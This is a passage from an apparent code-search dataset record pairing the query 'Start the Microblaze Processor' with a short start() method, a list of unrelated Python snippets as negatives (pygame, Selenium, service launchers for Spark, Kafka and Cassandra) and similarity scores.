pygame.display.set_mode(size, pygame.OPENGL | pygame.DOUBLEBUF)\n rabbyt.set_viewport(size)\n rabbyt.set_default_attribs()\n \"\"\", stacklevel=2)\n pygame = __import__(\"pygame\", {},{},[])\n pygame.init()\n surface = pygame.display.set_mode(size, pygame.OPENGL |\n pygame.DOUBLEBUF | flags)\n set_viewport(size)\n set_default_attribs()\n return surface", "def create_headless_browser(self) -> webdriver.firefox.webdriver.WebDriver:\n try:\n ff_opts = webdriver.FirefoxOptions()\n ff_opts.headless = True\n browser = webdriver.Firefox(options=ff_opts)\n except Exception as err:\n print(\"Unable to initialize headless FireFox session with Selenium.\")\n print(err)\n \n return browser", "def _create_device(self):\n project_page = 'https://garage.maemo.org/projects/brisa'\n self.device = Device('urn:schemas-upnp-org:device:BinaryLight:1',\n self.server_name,\n manufacturer='Brisa Team. 
Embedded Laboratory '\\\n 'and INdT Brazil',\n manufacturer_url=project_page,\n model_name='Binary Light Device',\n model_description='A UPnP Binary Light Device',\n model_number='1.0',\n model_url=project_page)", "def api_dev_factory(global_config, **local_conf):\n\treturn make_app(blueprints.api_server, settings.DevelopmentConfig)", "def start_virtual_display(self, width=1440, height=900,\n colordepth=24, **kwargs):\n if self._display is None:\n logger.info(\"Using virtual display: '{0}x{1}x{2}'\".format(\n width, height, colordepth))\n\n self._display = Xvfb(int(width), int(height),\n int(colordepth), **kwargs)\n self._display.start()\n atexit.register(self._display.stop)", "def getInstance():\n # TKC - Removed singleton since component and command instances were clashing.\n # if(GenFactory.__instance is None) :\n # GenFactory.__instance = GenFactory()\n #\n # return GenFactory.__instance\n return GenFactory()", "def new(self, **kwargs):\n return self.__model__(**self._preprocess_params(kwargs))", "def get_builder_instance(self):\n if self.framework == 'standalone':\n builder_instance = BuildStandaloneExecutionScenario(\n scenario=self.scenario,\n testcase_list=self.testcase_list,\n splunk_metadata=self.splunk_metadata\n )\n else:\n builder_instance = BuildOneMapExecutionScenario(\n scenario=self.scenario,\n testcase_list=self.testcase_list,\n splunk_metadata=self.splunk_metadata\n )\n return builder_instance", "def make(self, *args, **kwargs):\r\n mode = kwargs.pop('mode', theano.compile.mode.get_default_mode())\r\n rval = self.make_no_init(mode)\r\n if hasattr(rval, 'initialize'):\r\n rval.initialize(*args, **kwargs)\r\n return rval", "def create_instance(c_instance):\n return MonoPedal(c_instance)", "def new(self):\n self.__buttons.setDisabled(False)\n self.__service = None\n self.name.setFocus()\n self.name.setText(\"\")\n self.threadable.setChecked(False)\n self.min_cores.setValue(100)\n self.max_cores.setValue(100)\n self.min_memory.setValue(3276)\n self.min_gpu_memory.setValue(self.gpu_min_mb)\n self.timeout.setValue(0)\n self.timeout_llu.setValue(0)\n self.min_memory_increase.setValue(2048)\n self._tags_w.set_tags(['general'])", "def __new__(cls, ctx):\n return cls.__run(cls, ctx)", "def indev_class(cls, message: str, warning_type):\n cls.__doc__ = indev_doc(cls.__doc__, message)\n\n if cls.__new__ is object.__new__:\n cls.__init__ = indev_function(\n _get_function(cls.__init__),\n message=message,\n warning_type=warning_type,\n )\n else:\n cls.__new__ = indev_function(\n _get_function(cls.__new__),\n message=message,\n warning_type=warning_type,\n )\n\n return cls", "def New(derived_class):\n dc = derived_class()\n dc.initialize_implementation()\n return dc", "def makeDrawer(self,node):\n drawer = MeshDrawer2D()\n drawer.setBudget(3000)\n\n drawerNode = drawer.getRoot()\n drawerNode.reparentTo(node)\n drawerNode.setDepthWrite(False)\n drawerNode.setTransparency(True)\n drawerNode.setTwoSided(True)\n drawerNode.setBin(\"fixed\",0)\n drawerNode.setLightOff(True)\n drawerNode.node().setBounds(OmniBoundingVolume())\n drawerNode.node().setFinal(True) \n \n # debug wire frame\n #cc = drawerNode.copyTo(node)\n #cc.setRenderModeWireframe()\n\n return drawer", "def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(Config, cls).__new__(cls)\n return cls._instance", "def _set_debug_mode(self, value):\n self.debug_mode = value\n self.l_info(\"_set_debug_mode\",\"%d\" % (self.debug_mode))\n self.set_driver('GV4', self.debug_mode, uom=25, report=True)\n 
self.logger.setLevel(self.debug_mode)\n return True", "def __init__(self, api, coordinator, name, dev_id, model):\n super().__init__(api, coordinator, name, dev_id)\n\n self._model = model\n\n self._is_on = False\n\n self._unique_id = f\"{dev_id}-plug\"", "def create(\n cls,\n window, name, *,\n force_writes=False,\n follow_cursor=False,\n unlisted=False,\n **kwargs\n ):\n validate_view_options(kwargs)\n\n window.destroy_output_panel(name)\n view = window.create_output_panel(name, unlisted)\n set_view_options(view, **kwargs)\n\n return cls(window, name, force_writes=force_writes, follow_cursor=follow_cursor)", "def new_room(self):\r\n return Room()", "def create_instance(c_instance):\n return AumPC40(c_instance)", "def inst(cls):\n if cls.instance is None:\n raise OptionsError(\"No options have been set\")\n return cls.instance", "def open(cls, name, gxapi_vox=None, dtype=None, mode=MODE_READ, depth=False):\n\n if gxapi_vox is None:\n gxapi_vox = gxapi.GXVOX.create(_vox_file_name(name))\n vox = cls(name, gxapi_vox, dtype=dtype, mode=mode)\n\n vox.is_depth = depth\n\n return vox", "def instantiateNewCmd(self):\n return QadSTRETCHCommandClass(self.plugIn)", "def create_camera():\n camera = PiCamera()\n camera.hflip = True\n camera.vflip = True\n camera.resolution = tuple(camera_settings['resolution'])\n camera.framerate = camera_settings['fps']\n return camera", "def create_gpu_device():\n d1 = dpctl.SyclDevice(\"gpu\")\n d2 = dpctl.select_gpu_device()\n assert d1 == d2\n print_device(d1)\n return d1", "def development_function(self): \n return None", "def program( self, mode ):\n renderer = mode.cache.getData( self )\n if renderer is None:\n renderer = self.compile( mode )\n return renderer" ]
[ "0.5734324", "0.55724305", "0.55724305", "0.5561178", "0.55437505", "0.55043155", "0.5407992", "0.53603274", "0.5352191", "0.53068537", "0.5200111", "0.5169847", "0.51558495", "0.51315564", "0.51260436", "0.5092145", "0.5049877", "0.5045362", "0.500854", "0.49994266", "0.49444494", "0.49435768", "0.4925886", "0.49178022", "0.4917745", "0.49145707", "0.49081364", "0.49051312", "0.48858374", "0.48664016", "0.48664016", "0.48501012", "0.48344013", "0.4829021", "0.4826624", "0.4822309", "0.4815776", "0.4815297", "0.48006752", "0.47928122", "0.47864148", "0.4780967", "0.47797477", "0.47545666", "0.4752097", "0.47470346", "0.47467592", "0.47337326", "0.47259137", "0.4716329", "0.47162554", "0.47162554", "0.47145566", "0.47059497", "0.46990258", "0.46941355", "0.46785253", "0.4662854", "0.46628127", "0.46591058", "0.46473068", "0.4645969", "0.4645341", "0.46303642", "0.4626543", "0.46220952", "0.46211243", "0.4612522", "0.4611813", "0.46102652", "0.46033788", "0.45876977", "0.45828003", "0.45791033", "0.4573825", "0.4566799", "0.45662266", "0.45604637", "0.4555562", "0.4552675", "0.45491856", "0.45467395", "0.4545077", "0.4544945", "0.45425183", "0.4535086", "0.45261917", "0.45252597", "0.4520397", "0.45164576", "0.45093152", "0.45091543", "0.45070767", "0.45025674", "0.4501141", "0.450016", "0.44996545", "0.44985366", "0.44890076", "0.44888896", "0.448576" ]
0.0
-1
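The two DevMode rows here (the constructor just above and the start() method in the record that follows) come from hardware-bound PYNQ code. Below is a hedged, self-contained stand-in: the Microblaze wrapper and the mailbox constants are stubs, and every value marked as an assumption is a placeholder rather than the real PYNQ API.

ARDUINO_MAILBOX_PROGRAM = "mailbox.bin"  # placeholder program name (assumption)
MAILBOX_OFFSET = 0xF000                  # assumed value, for illustration only
MAILBOX_PY2IOP_CMD_OFFSET = 0xFFC        # assumed value, for illustration only


class Arduino:
    # Stub Microblaze wrapper: records calls instead of touching hardware.
    def __init__(self, mb_info, program):
        self.mb_info, self.program = mb_info, program

    def run(self):
        print(f"loading {self.program} onto {self.mb_info}")

    def write(self, address, value):
        print(f"write 0x{value:x} -> 0x{address:x}")


class DevMode:
    def __init__(self, mb_info, switch_config):
        self.microblaze = Arduino(mb_info, ARDUINO_MAILBOX_PROGRAM)
        self.iop_switch_config = switch_config

    def start(self):
        # Mirrors the start() row below: run the processor, clear the
        # command mailbox, then push the switch configuration.
        self.microblaze.run()
        self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, 0)
        self.load_switch_config(self.iop_switch_config)

    def load_switch_config(self, config):
        print(f"configuring {len(config)} switch pins")


dev = DevMode(mb_info="iop3", switch_config=[0] * 20)
dev.start()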
Start the Microblaze Processor. The processor instance will start automatically after instantiation.
def start(self): self.microblaze.run() self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, 0) self.load_switch_config(self.iop_switch_config)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def startup(self):\n if self.initialize_mp:\n self.initialize_multiprocessing()\n self.startup_run()\n self.startup_finish()", "def start(params) -> None:\n check_root()\n start_microservice(params)\n load_kernel_module(params)\n start_streamer(params)", "def platform_start(self):\n self.platform.start()", "def start(self):\n control_process = mp.Process(target = self._start, args = [])\n control_process.start()", "async def start(self):\n await self._backend.start()", "def Start(self):\n\n\n\n assert not self._process, 'Start() can only be called once'\n self._process = subprocess.Popen(self._args)", "def run(self) -> None:\n self.microphone.start()\n try:\n self._run()\n finally:\n self.microphone.stop()", "def start(self) -> None:\n context = self._get_multiprocessing_context()\n self._last_parsing_stat_received_at = time.monotonic()\n\n self._parent_signal_conn, child_signal_conn = context.Pipe()\n process = context.Process(\n target=type(self)._run_processor_manager,\n args=(\n self._dag_directory,\n self._max_runs,\n self._processor_timeout,\n child_signal_conn,\n self._dag_ids,\n self._pickle_dags,\n self._async_mode,\n ),\n )\n self._process = process\n\n process.start()\n\n self.log.info(\"Launched DagFileProcessorManager with pid: %s\", process.pid)", "def initialize_multiprocessing(self):\n if self.multiprocessing_controller is not None:\n MPControl.set_multiprocess_engine(self.multiprocessing_controller)\n MPControl.connect()", "def start(self):\n\n address = (socket.gethostbyname(self.hostname), self.port)\n logger.info(\"Connecting to %r\" % (address,))\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.connect(address)\n self._start_processors()\n return self", "def start(self):\n self.j_pump.start()\n return self", "def start(self):\n \n rpc = self.smartstarter.rpcsystem\n \n process = yield self.smartstarter.start()\n \n try:\n \n make_worker_url = yield process.get_function_url(make_worker)\n make_worker_stub = rpc.create_function_stub(make_worker_url)\n \n worker = yield make_worker_stub(\"local\") # TODO remove network\n \n worker.get_function_url = process.get_function_url_stub\n \n worker.reset = rpc.create_local_function_stub(process.reset)\n worker.stop = rpc.create_local_function_stub(process.stop)\n worker.kill = rpc.create_local_function_stub(process.kill)\n worker.stdout = process.stdout.make_stub(rpc)\n worker.stderr = process.stderr.make_stub(rpc)\n worker.exited = process.exited.make_stub(rpc)\n\n except:\n process.kill()\n raise \n \n\n \n # worker.stdout.add_callback(stdout)\n # worker.stderr.add_callback(stderr)\n \n# receiver_stub = rpc.create_local_function_stub(hook.receiver)\n# hookinstall_url = yield process.get_function_url(hook.install_hook)\n# hookinstall_url_stub = rpc.create_function_stub(hookinstall_url)\n# yield hookinstall_url_stub(receiver_stub)\n \n defer.returnValue(worker)", "def start(self):\n self.p.start()", "def start(self):\n logger.debug('Starting controller')\n pass", "def start(self) -> None:\n JavaGate().exec_process_instance(\n self._user,\n self._project,\n self.name,\n \"\",\n self.worker_group,\n self.warning_type,\n self.warning_group_id,\n 24 * 3600,\n )", "def start(self):\n if self._start_event is None:\n _call_spawn_callbacks(self)\n hub = get_my_hub(self) # pylint:disable=undefined-variable\n self._start_event = hub.loop.run_callback(self.switch)", "def start(self):\n if self._started:\n return\n\n self._register()\n self._started = True", "def add_cpu(self):\n cpu_worker = 
CPUCmdRunner(self.host, 'cpu')\n self.cpu_workers.append(cpu_worker)\n cpu_worker.start()\n self.log.info('CPU worker added')", "def start_processing(self):", "def start(self):\n for workload in self._workloads:\n self.log.info(\"%-20s STARTING port=%s\" % (workload.name(), workload.port()))\n workload.pre_start()\n workload.start()\n self._monitor_loop()\n self._cleanup()", "def _start(self):\n\n _log.debug(\"Pipeline {} launching run components\".format(self.id))\n self._start_time = time.time()\n for run in self.runs:\n run.start()\n if run.sleep_after:\n time.sleep(run.sleep_after)", "def do_start(self,processor):\n # app_logger = self.construct_logger(rta_constants.PROPERTIES_LOG_FILE)\n running_dict = {}\n for item in self.get_running_status():\n running_dict[item.get('processor')]=item.get('status')\n\n if processor == 'spark':\n if running_dict:\n if running_dict['spark<spark_worker>'] != 'Running' and running_dict['spark<spark_master>'] != 'Running':\n try:\n cmd_line = self.cmd_start_spark\n cmd = subprocess.Popen([cmd_line],shell=True,stdout=subprocess.PIPE)\n (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['spark<spark_worker>'] == 'Running' or running_dict['spark<spark_master>'] == 'Running':\n print('Spark Server is running!! please trying to stop it before it starts.')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n return\n\n elif processor == 'tomcat':\n if running_dict.has_key('tomcat') and running_dict['tomcat'] != 'Running':\n try:\n cmd_line = self.cmd_start_tomcat\n # print('staring tomcat server------->')\n print cmd_line\n\n # 2311 Vpl update to fix problem of catalina shutdown when term exit (10.x timeout)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n #print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('tomcat'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Tomcat Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'HDFS':\n #1/5/2017 Commit by JOJO\n '''\n if running_dict.has_key('HDFS') and running_dict['HDFS'] != 'Running':\n try:\n cmd_line = self.cmd_start_hadoop_hdfs\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('HDFS has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('HDFS'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('HDFS server is running!! please trying to stop it before it start.')\n return\n '''\n print('Please type correct command! 
You may use \"help start\" see more help')\n return\n elif processor == 'web_management':\n if running_dict.has_key('web_management') and running_dict['web_management'] != 'Running':\n try:\n cmd_line = 'python '+self.cmd_start_web_management\n print('starting web_management webserver------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n (output,err) = cmd.communicate()\n print(output)\n # app_logger.info('*********output logging **************')\n # print(output)\n print('web_management webserver has been started!')\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('web_management'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Flask webserver is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'novelty':\n if running_dict.has_key('novelty') and running_dict['novelty'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_novelty_detector\n # print('staring novelty------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('novelty has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('novelty'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['novelty'] == 'Running':\n print('novelty processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n\n elif processor == 'raw_writer':\n if running_dict.has_key('raw_writer') and running_dict['raw_writer'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running':\n try:\n cmd_line = self.cmd_start_raw_writer\n # print('staring raw_writer------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n print('raw_writer has been started!')\n return\n\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('raw_writer'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['raw_writer'] == 'Running':\n print('raw_writer processor is running!! please trying to stop it before it start.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! 
trying to use command \"start spark\"')\n return\n\n elif processor == 'cassandra':\n if running_dict.has_key('cassandra') and running_dict['cassandra'] != 'Running':\n try:\n cmd_line = self.cmd_start_cassandra\n # print('starting cassandra------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of cassandra shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('cassandra has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('cassandra'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('cassandra Server is running!! please trying to stop it before it start.')\n return\n\n elif processor == 'kairosDb':\n if running_dict.has_key('kairosDb') and running_dict['kairosDb'] != 'Running' and running_dict['cassandra']=='Running':\n try:\n cmd_line = self.cmd_start_kairosDB\n # print('staring kairosDB------->')\n\n # print cmd_line\n\t\t\t\t\t#2311 Vpl update to fix problem of kairosDb shutdown when term exit (10.x timeout)\n\t\t\t\t\t#cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n print('kairosDb has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kairosDb'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['cassandra']=='Stopped':\n print('cassandra required starting before kairosDb is running!! please trying to \"start cassandra\" first')\n return\n elif running_dict['kairosDB'] == 'Running':\n print('kairosDB Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'grafana':\n if running_dict.has_key('grafana') and running_dict['grafana'] != 'Running' and running_dict['kairosDb']=='Running':\n try:\n cmd_line = self.cmd_start_grafana\n # print('staring grafana------->')\n # print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n # (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n # print(output)\n print ('grafana has been started!')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('grafana'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['kairosDb']=='Stopped':\n print('kairosDb required starting before grafana is running!! please trying to \"start kairoseDb\" first')\n return\n elif running_dict['grafana'] == 'Running':\n print('grafana Server is running!! 
please trying to stop it before it starts.')\n return\n\n elif processor == 'kafka':\n if running_dict.has_key('kafka') and running_dict['kafka'] != 'Running' and running_dict['zookeeper']=='Running':\n try:\n cmd_line = self.cmd_start_kafka\n print('starting kafka------->')\n # print cmd_line\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n print ('kafka has been started!')\n return\n # app_logger.info('*********output logging **************')\n # print(output)\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('kafka'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n elif running_dict['zookeeper']=='Stopped':\n print('zookeeper required starting before kafka is running!! please trying to \"start zookeeper\" first')\n return\n elif running_dict['kafka'] == 'Running':\n print('Kafka Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'zookeeper':\n if running_dict.has_key('zookeeper') and running_dict['zookeeper'] != 'Running':\n try:\n cmd_line = self.cmd_start_zookeeper\n # print('staring zookeeper------->')\n # print (cmd_line)\n\n #2311 Vpl update to fix problem of zookeeper shutdown when term exit (10.x timeout)\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n cmd = subprocess.Popen(cmd_line)\n # (output,err) = cmd.communicate()\n # print (output)\n\n print('zookeeper has been started!')\n return\n except Exception as ex:\n print(\" Failed to stop processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('zookeeper'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n else:\n print('Zookeeper Server is running!! please trying to stop it before it starts.')\n return\n\n elif processor == 'accl_processor':\n if running_dict:\n if running_dict['accl_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_accl_processor\n print cmd_line\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #cmd = subprocess.Popen(['nohup',cmd_line])\n # cmd = subprocess.Popen(cmd_line)\n\n print ('Accelerometer processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['accl_processor'] == 'Running':\n print('Accelerometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! 
You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'baro_processor':\n if running_dict:\n if running_dict['baro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_baro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Barometer processor has been started')\n\t\t\tprint (cmd_line)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['baro_processor'] == 'Running':\n print('Barometer processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'gyro_processor':\n if running_dict:\n if running_dict['gyro_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_gyro_processor\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Gyroscope processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['gyro_processor'] == 'Running':\n print('Gyroscope processor is running!! please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n elif processor == 'aggr_processor':\n if running_dict:\n if running_dict['aggr_processor'] != 'Running' and running_dict['spark<spark_worker>'] == 'Running' and running_dict['spark<spark_master>'] == 'Running' and running_dict['zookeeper'] == 'Running' and running_dict['kafka'] == 'Running':\n try:\n cmd_line = self.cmd_start_aggr_naiv\n cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n print ('Aggregator processor has been started')\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['aggr_processor'] == 'Running':\n print('Aggregator processor is running!! 
please trying to stop it before it starts.')\n return\n elif running_dict['spark<spark_worker>'] == 'Stopped' or running_dict['spark<spark_master>'] == 'Stopped':\n print('Please start spark first!! trying to use command \"start spark\"')\n return\n elif running_dict['zookeeper'] == 'Stopped':\n print('Please start zookeeper server first!! trying to use command \"start zookeeper\"')\n return\n elif running_dict['kafka'] == 'Stopped':\n print('Please start kafka server first!! trying to use command \"start kafka\"')\n return\n else:\n print ('Please type correct command! You may use \"help start\" see more help')\n sys.exit(1)\n\n else:\n print ('Please type correct command! You may use \"help start\" see more help')", "def start(self) -> None:\n data = {\n \"pipeline\": self.pipeline.id,\n \"language\": self.language,\n }\n if self.runner_data is not None:\n data[\"runner_data\"] = self.runner_data\n\n self.process_event(PipelineEvent(PipelineEventType.RUN_START, data))", "def run(self):\n self.process.start()", "def start_run(self, context: RobotRunnerContext) -> None:\n rospy.init_node(\"robot_runner\", disable_signals=True)\n self.ina219_profiler = INA219ProfilerClient()\n self.cpu_mem_profiler = ResourceProfilerClient()", "def start(self):\n self._setup_thread()\n self.thread.start()", "def run(self):\n client = ProcessorClient()\n try:\n client.connect(self.address)\n except Exception as e:\n self.error = e\n logging.error(e)\n else:\n self.clients[self.name] = client", "def start(self):\n self._proc = self._get_subprocess()\n self._pid = self._proc.pid\n self._return_code = None", "def start(self):\n if not self._Thread__initialized:\n raise RuntimeError('thread.__init__() not called')\n if self._Thread__started.is_set():\n raise RuntimeError('threads can only be started once')\n with threading._active_limbo_lock:\n threading._limbo[self] = self\n try:\n start_new_background_thread(self.__bootstrap, ())\n except Exception:\n with threading._active_limbo_lock:\n del threading._limbo[self]\n raise\n self._Thread__started.wait()", "def start( self ):\n\n self.service()", "def start():\n\n start_server()", "def start():\n server = current_server()\n logger.info('Starting Flexx event loop.')\n server.start()", "def start(self):\n\n # ioloop.install()\n threading.Thread(target=self.loop.start).start()\n time.sleep(1)", "def start(self):\r\n if self._ready:\r\n return\r\n\r\n self._start()\r\n self._ready = True", "def start(self, logfile_name):\n\n self._verify_not_running()\n\n # The package structure for LiteServ is different pre 1.4. 
Handle for this case\n if has_dot_net4_dot_5(self.version_build):\n binary_path = \"{}/couchbase-lite-net-mono-{}-liteserv/net45/LiteServ.exe\".format(BINARY_DIR, self.version_build)\n else:\n binary_path = \"{}/couchbase-lite-net-mono-{}-liteserv/LiteServ.exe\".format(BINARY_DIR, self.version_build)\n\n process_args = [\n \"mono\",\n binary_path,\n \"--port\", str(self.port),\n \"--dir\", \"{}/dbs/net-mono/\".format(RESULTS_DIR)\n ]\n\n if self.storage_engine == \"ForestDB\" or self.storage_engine == \"ForestDB+Encryption\":\n process_args.append(\"--storage\")\n process_args.append(\"ForestDB\")\n else:\n process_args.append(\"--storage\")\n process_args.append(\"SQLite\")\n\n if self.storage_engine == \"SQLCipher\" or self.storage_engine == \"ForestDB+Encryption\":\n log_info(\"Using Encryption ...\")\n db_flags = []\n for db_name in REGISTERED_CLIENT_DBS:\n db_flags.append(\"--dbpassword\")\n db_flags.append(\"{}=pass\".format(db_name))\n process_args.extend(db_flags)\n\n log_info(\"Launching: {} with args: {}\".format(binary_path, process_args))\n\n self.logfile = open(logfile_name, \"w\")\n self.process = subprocess.Popen(args=process_args, stdout=self.logfile)\n\n self._verify_launched()\n\n return \"http://{}:{}\".format(self.host, self.port)", "def setUp(self):\n self.core_processor = core_processor.ProcessCores()", "def starting(self) -> None:\n self._prepopulate_runnables()\n self._loop_handler = threading.Thread(target=self._loop)\n self._loop_handler.daemon = True\n self._loop_handler.start()", "def start(verbose=False):\n\n _prepare_execution(verbose)\n _validate_components_prepared('start')\n logger.notice('Starting Cloudify Manager services...')\n for component in components:\n if not component.skip_installation:\n component.start()\n logger.notice('Cloudify Manager services successfully started!')\n _print_time()", "def start(self):\n if self.__running:\n raise RuntimeError('already started')\n self.__hook_thread = threading.Thread(target=self.__run_hook, args=(self.__build_runner(),))\n self.__running = True\n self.__hook_thread.start()", "def start(self):\n if self.preemptableScaler != None:\n self.preemptableScaler.start()\n\n if self.scaler != None:\n self.scaler.start()", "def start():\n logging.info(\"Execution Started\")", "def start(self) -> None:\n start_thread(super().start, self.__class__.__name__)", "def start(self):\n if self._callable:\n self._is_running = True\n self._run_client()", "def do_start(self, arg):\n args = arg.split(\" \")\n 